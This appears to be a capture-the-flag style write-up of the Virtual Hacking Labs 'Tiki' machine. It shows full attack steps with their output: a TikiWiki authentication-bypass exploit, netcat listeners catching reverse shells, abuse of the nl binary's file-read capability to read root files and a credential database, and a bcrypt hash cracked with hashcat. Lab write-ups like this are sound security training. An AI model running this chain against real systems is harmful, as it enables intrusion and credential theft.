xsspresso
xsspresso
WriteupsVHL — Tiki
WebEasyLinux

VHL — Tiki

TikiWiki CMS Groupware on CentOS. Exploited a known CVE for unauthenticated remote code execution to gain a shell.

February 10, 2025Virtual Hacking Labs
#TikiWiki#CMS#RCE#CVE

nmap

sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.39
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 10:54 EST
Stats: 0:00:41 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 10:54 (0:00:10 remaining)
Nmap scan report for 10.11.1.39
Host is up (0.023s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:bb:37:7a:fc:a2:56:3f:25:69:54:27:94:2a:81:a4 (RSA)
|   256 f7:fc:b9:bd:45:b6:e8:40:9d:ee:68:19:d4:48:f5:1d (ECDSA)
|_  256 10:2c:35:1c:5c:8b:62:73:40:0a:30:00:9a:9a:d5:2a (ED25519)
80/tcp   open  http       Apache httpd 2.4.6 ((CentOS) PHP/7.2.34)
|_http-generator: Tiki Wiki CMS Groupware - https://tiki.org
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.2.34
| http-title: Tiki | HomePage
|_Requested resource was http://10.11.1.39/tiki-index.php
| http-robots.txt: 40 disallowed entries (15 shown)
| / /tiki-forums.php /tiki-view_forum.php 
| /tiki-index.php /tiki-read_article.php /tiki-view_blog.php 
| /tiki-list_file_gallery.php /tiki-view_forum_thread.php /*structure=*  /temp/ 
|_/addons/ /admin/ /backup/ /db/ /doc/
3306/tcp open  mysql      MySQL (unauthorized)
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: no-cache, no-store, must-revalidate
|     Content-Type: text/html; charset=utf-8
|     X-Xss-Protection: 1; mode=block
|     Date: Mon, 10 Feb 2025 15:54:22 GMT
|     <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no"><title>File Browser</title><link rel="icon" type="image/png" sizes="32x32" href="/static/img/icons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/static/img/icons/favicon-16x16.png"><link rel="manifest" id="manifestPlaceholder" crossorigin="use-credentials"><meta name="theme-color" content="#2979ff"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><meta name="apple-mobile-web-app-title" content="assets"><link rel="appl
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Cache-Control: no-cache, no-store, must-revalidate
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Mon, 10 Feb 2025 15:54:22 GMT
|     Content-Length: 14
|     Found
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|_    Request
|_http-title: File Browser
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=2/10%Time=67AA212E%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,11AC,"HTTP/1\.0\x20200\x20OK\r\nCache-Control:\x20no-cache,
SF:\x20no-store,\x20must-revalidate\r\nContent-Type:\x20text/html;\x20char
SF:set=utf-8\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Mon,\x20
SF:10\x20Feb\x202025\x2015:54:22\x20GMT\r\n\r\n<!DOCTYPE\x20html><html\x20
SF:lang=\"en\"><head><meta\x20charset=\"utf-8\"><meta\x20http-equiv=\"X-UA
SF:-Compatible\"\x20content=\"IE=edge\"><meta\x20name=\"viewport\"\x20cont
SF:ent=\"width=device-width,initial-scale=1,user-scalable=no\"><title>File
SF:\x20Browser</title><link\x20rel=\"icon\"\x20type=\"image/png\"\x20sizes
SF:=\"32x32\"\x20href=\"/static/img/icons/favicon-32x32\.png\"><link\x20re
SF:l=\"icon\"\x20type=\"image/png\"\x20sizes=\"16x16\"\x20href=\"/static/i
SF:mg/icons/favicon-16x16\.png\"><link\x20rel=\"manifest\"\x20id=\"manifes
SF:tPlaceholder\"\x20crossorigin=\"use-credentials\"><meta\x20name=\"theme
SF:-color\"\x20content=\"#2979ff\"><meta\x20name=\"apple-mobile-web-app-ca
SF:pable\"\x20content=\"yes\"><meta\x20name=\"apple-mobile-web-app-status-
SF:bar-style\"\x20content=\"black\"><meta\x20name=\"apple-mobile-web-app-t
SF:itle\"\x20content=\"assets\"><link\x20rel=\"appl")%r(HTTPOptions,DF,"HT
SF:TP/1\.0\x20404\x20Not\x20Found\r\nCache-Control:\x20no-cache,\x20no-sto
SF:re,\x20must-revalidate\r\nContent-Type:\x20text/plain;\x20charset=utf-8
SF:\r\nX-Content-Type-Options:\x20nosniff\r\nDate:\x20Mon,\x2010\x20Feb\x2
SF:02025\x2015:54:22\x20GMT\r\nContent-Length:\x2014\r\n\r\n404\x20Not\x20
SF:Found\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConte
SF:nt-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\
SF:n400\x20Bad\x20Request")%r(FourOhFourRequest,11AC,"HTTP/1\.0\x20200\x20
SF:OK\r\nCache-Control:\x20no-cache,\x20no-store,\x20must-revalidate\r\nCo
SF:ntent-Type:\x20text/html;\x20charset=utf-8\r\nX-Xss-Protection:\x201;\x
SF:20mode=block\r\nDate:\x20Mon,\x2010\x20Feb\x202025\x2015:54:22\x20GMT\r
SF:\n\r\n<!DOCTYPE\x20html><html\x20lang=\"en\"><head><meta\x20charset=\"u
SF:tf-8\"><meta\x20http-equiv=\"X-UA-Compatible\"\x20content=\"IE=edge\"><
SF:meta\x20name=\"viewport\"\x20content=\"width=device-width,initial-scale
SF:=1,user-scalable=no\"><title>File\x20Browser</title><link\x20rel=\"icon
SF:\"\x20type=\"image/png\"\x20sizes=\"32x32\"\x20href=\"/static/img/icons
SF:/favicon-32x32\.png\"><link\x20rel=\"icon\"\x20type=\"image/png\"\x20si
SF:zes=\"16x16\"\x20href=\"/static/img/icons/favicon-16x16\.png\"><link\x2
SF:0rel=\"manifest\"\x20id=\"manifestPlaceholder\"\x20crossorigin=\"use-cr
SF:edentials\"><meta\x20name=\"theme-color\"\x20content=\"#2979ff\"><meta\
SF:x20name=\"apple-mobile-web-app-capable\"\x20content=\"yes\"><meta\x20na
SF:me=\"apple-mobile-web-app-status-bar-style\"\x20content=\"black\"><meta
SF:\x20name=\"apple-mobile-web-app-title\"\x20content=\"assets\"><link\x20
SF:rel=\"appl");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/10%OT=22%CT=1%CU=37628%PV=Y%DS=2%DC=I%G=Y%TM=67AA
OS:2194%P=x86_64-pc-linux-gnu)SEQ(SP=FC%GCD=1%ISR=10D%TI=Z%TS=A)SEQ(SP=FC%G
OS:CD=1%ISR=10D%TI=Z%II=I%TS=A)SEQ(SP=FD%GCD=1%ISR=10D%TI=Z%II=I%TS=A)SEQ(S
OS:P=FE%GCD=1%ISR=10C%TI=Z%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NN
OS:T11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=
OS:FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%
OS:Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF
OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=
OS:164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
 
Network Distance: 2 hops
 
TRACEROUTE
HOP RTT      ADDRESS
1   22.64 ms 10.11.1.39
 
OS and Service detection performed. Please report any incorrec

80

sh
80/tcp   open  http       Apache httpd 2.4.6 ((CentOS) PHP/7.2.34)
|_http-generator: Tiki Wiki CMS Groupware - https://tiki.org
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.2.34
| http-title: Tiki | HomePage
|_Requested resource was http://10.11.1.39/tiki-index.php
| http-robots.txt: 40 disallowed entries (15 shown)
| / /tiki-forums.php /tiki-view_forum.php 
| /tiki-index.php /tiki-read_article.php /tiki-view_blog.php 
| /tiki-list_file_gallery.php /tiki-view_forum_thread.php /*structure=*  /temp/ 
|_/addons/ /admin/ /backup/ /db/ /doc/

8080

sh
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: no-cache, no-store, must-revalidate
|     Content-Type: text/html; charset=utf-8
|     X-Xss-Protection: 1; mode=block
|     Date: Mon, 10 Feb 2025 15:54:22 GMT
|     <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no"><title>File Browser</title><link rel="icon" type="image/png" sizes="32x32" href="/static/img/icons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/static/img/icons/favicon-16x16.png"><link rel="manifest" id="manifestPlaceholder" crossorigin="use-credentials"><meta name="theme-color" content="#2979ff"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><meta name="apple-mobile-web-app-title" content="assets"><link rel="appl
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Cache-Control: no-cache, no-store, must-revalidate
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Mon, 10 Feb 2025 15:54:22 GMT
|     Content-Length: 14
|     Found
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|_    Request
|_http-title: File Browser
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

Tiki Wiki CMS Groupware 21.1 - Authentication Bypass

  • https://www.exploit-db.com/exploits/48927

  • edit the code to delete /tiki/ because theres no directory
sh
python3 48927.py 10.11.1.39 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password 
Admin Password got removed.
Use BurpSuite to login into admin without a password
  • intercept the login with burp, delete password and fofrward the request

scheduler

sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.39] 60592
bash: no job control in this shell
bash-4.2$ whoami
whoami
apache
sh
python -c 'import pty; pty.spawn("/bin/bash")'

priv esc

capabilities (nl)

  • cap_dac_read_search allows to read any file
sh
Files with capabilities (limited to 50):
/usr/bin/nl = cap_dac_read_search+ep
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/local/bin/filebrowser = cap_net_bind_service+ep
sh
bash-4.2$ ls / 
ls /
bin   dev  filebrowser.db  lib	  media  opt   root  sbin  sys	usr
boot  etc  home		   lib64  mnt	 proc  run   srv   tmp	var
  • the applicatoin on port 8080 runs with high privileges
sh
bash-4.2$ ps aux | grep 'root'
ps aux | grep 'root'
root          1  0.0  0.4 125432  4376 ?        Ss   10:53   0:01 /usr/lib/systemd/systemd --switched-root --
root        758  0.0  0.2 168164  2304 ?        Ss   10:53   0:00 /usr/bin/VGAuthService -s
root        760  0.1  0.6 348796  6368 ?        Ssl  10:53   0:30 /usr/bin/vmtoolsd
root        769  0.0  0.7 562664  7692 ?        Ssl  10:53   0:00 /usr/sbin/NetworkManager --no-daemon
root        770  0.0  0.2  26400  2176 ?        Ss   10:53   0:00 /usr/lib/systemd/systemd-logind
root        772  0.0  0.1 126408  1664 ?        Ss   10:53   0:00 /usr/sbin/crond -n
root        789  0.0  0.1 110224  1408 tty1     Ss+  10:53   0:00 /sbin/agetty --noclear tty1 linux
root       1029  0.0  0.2 113016  2688 ?        Ss   10:53   0:00 /usr/sbin/sshd -D
root       1032  0.0  2.8 466148 27200 ?        Ss   10:53   0:02 /usr/sbin/httpd -DFOREGROUND
root       1034  0.0  0.9 574304  8900 ?        Ssl  10:53   0:03 /usr/bin/python2 -Es /usr/sbin/tuned -l -P
root       1041  0.0  0.4 214276  4224 ?        Ssl  10:53   0:01 /usr/sbin/rsyslogd -n
root       1043  0.1  1.4 723880 14216 ?        Ssl  10:53   0:28 /usr/local/bin/filebrowser -r /var/www/html -a 0.0.0.0 -p 8080
  • https://gtfobins.github.io/gtfobins/nl/
sh
bash-4.2$ LFILE=/root/key.txt
LFILE=/root/key.txt
bash-4.2$ nl -bn -w1 -s '' $LFILE
nl -bn -w1 -s '' $LFILE
 nlk5ar37smnjoctv4mvt
sh
bash-4.2$ LFILE=/filebrowser.db
LFILE=/filebrowser.db
bash-4.2$ nl -bn -w1 -s '' $LFILE
nl -bn -w1 -s '' $LFILE
 ��

 _������
	
��rM\mP9����U__storm_metadatacodecjsonauther{"recaptcha":null}server{"root":".","baseURL":"","socket":"","tlsKey":"","tlsCert":"","port":"8080","address":"127.0.0.1","log":"stdout","enableThumbnails":false,"resizePreview":false,"enableExec":false,"typeDetectionByHeader":false,"authHook":""}settings{"key":"3jCbLXoHr5Q/ACvoh1xwtk9bSyZXwKYPahCZN0qiqDTCFFzw5PrmiTtO9dYDa2V2wyhVUjkGd+aYjMhsB9oe4g==","signup":false,"createUserDir":false,"userHomeBasePath":"","defaults":{"scope":".","locale":"en","viewMode":"list","singleClick":false,"sorting":{"by":"name","asc":false},"perm":{"admin":false,"execute":true,"create":true,"rename":true,"modify":true,"delete":true,"share":true,"download":true},"commands":[],"hideDotfiles":false,"dateFormat":false},"authMethod":"json","branding":{"name":"","disableExternal":false,"files":"","theme":"","color":""},"commands":{"after_copy":[],"after_delete":[],"after_rename":[],"after_save":[],"after_upload":[],"before_copy":[],"before_delete":[],"before_rename":[],"before_save":[],"before_upload":[]},"shell":[],"rules":[]}version2��@<RZ{"id":1,"username":"tiki","password":"$2a$10$VDo0bFCJOPUnUGPby2NhZODKUiqfIRSKlwbb47HVOOQkRf7j/AX9K","scope":"/","locale":"en","lockPassword":false,"viewMode":"list","singleClick":false,"perm":{"admin":true,"execute":true,"create":true,"rename":true,"modify":true,"delete":true,"share":true,"download":true},"commands":[],"sorting":{"by":"name","asc":false},"rules":[],"hideDotfiles":false,"dateFormat":false}__storm_index___storm_index_Usernamtiki__storm_metadata      !IDcountercodecjson 9Y__storm_metadatacodecjsonversion"2.0.0"P9����U__storm_metadatacodecjsonauther{"recaptcha":null}server{"root":".","baseURL":"","socket":"","tlsKey":"","tlsCert":"","port":"8080","address":"127.0.0.1","log":"stdout","enableThumbnails":false,"resizePreview":false,"enableExec":false,"typeDetectionByHeader":false,"authHook":""}settings{"key":"3jCbLXoHr5Q/ACvoh1xwtk9bSyZXwKYPahCZN0qiqDTCFFzw5PrmiTtO9dYDa2V2wyhVUjkGd+aYjMhsB9oe4g==","signup":false,"createUserDir":false,"userHomeBasePath":"","defaults":{"scope":".","locale":"en","viewMode":"list","singleClick":false,"sorting":{"by":"name","asc":false},"perm":{"admin":false,"execute":true,"create":true,"rename":true,"modify":true,"delete":true,"share":true,"download":true},"commands":[],"hideDotfiles":false,"dateFormat":false},"authMethod":"json","branding":{"name":"","disableExternal":false,"files":"","theme":"","color":""},"commands":{"after_copy":[],"after_delete":[],"after_rename":[],"after_save":[],"after_upload":[],"before_copy":[],"before_delete":[],"before_rename":[],"before_save":[],"before_upload":[]},"shell":[],"rules":[]}version204
 >User__storm_dbconfig04
 >User__storm_dbconfig

hashcat

sh
hashcat -m 3200 '$2a$10$VDo0bFCJOPUnUGPby2NhZODKUiqfIRSKlwbb47HVOOQkRf7j/AX9K' /usr/share/wordlists/rockyou.txt
 
$2a$10$VDo0bFCJOPUnUGPby2NhZODKUiqfIRSKlwbb47HVOOQkRf7j/AX9K:mimamamemima

creds

tiki:mimamamemima

  • open any file > save to trigger execution
sh
nc -lvnp 1235
listening on [any] 1235 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.39] 38608
bash: no job control in this shell
[root@localhost /]# whoami
whoami
root
[root@localhost /]# cd /root
cd /root
[root@localhost ~]# ls
ls
anaconda-ks.cfg
key.txt
mysql-community-release-el7-5.noarch.rpm
[root@localhost ~]# cat key.txt
cat key.txt
nlk5ar37smnjoctv4mvt
[root@localhost ~]# date
date
Mon Feb 10 18:24:38 EST 2025

Up next

EasyFeb 2025

VHL — VPS1723

Webmin 1.991 on Ubuntu. CVE-2019-15107 arbitrary command execution via the password reset endpoint for instant root access.

Read writeup
EasyFeb 2025

VHL — Helpdesk

FTP with anonymous access reveals helpdesk application credentials. SQL injection and file upload lead to remote code execution.

Read writeup
EasyFeb 2025

VHL — Steven

Wing FTP Server on Windows. Default admin credentials allow access to the web admin panel, leading to command execution via scheduled tasks.

Read writeup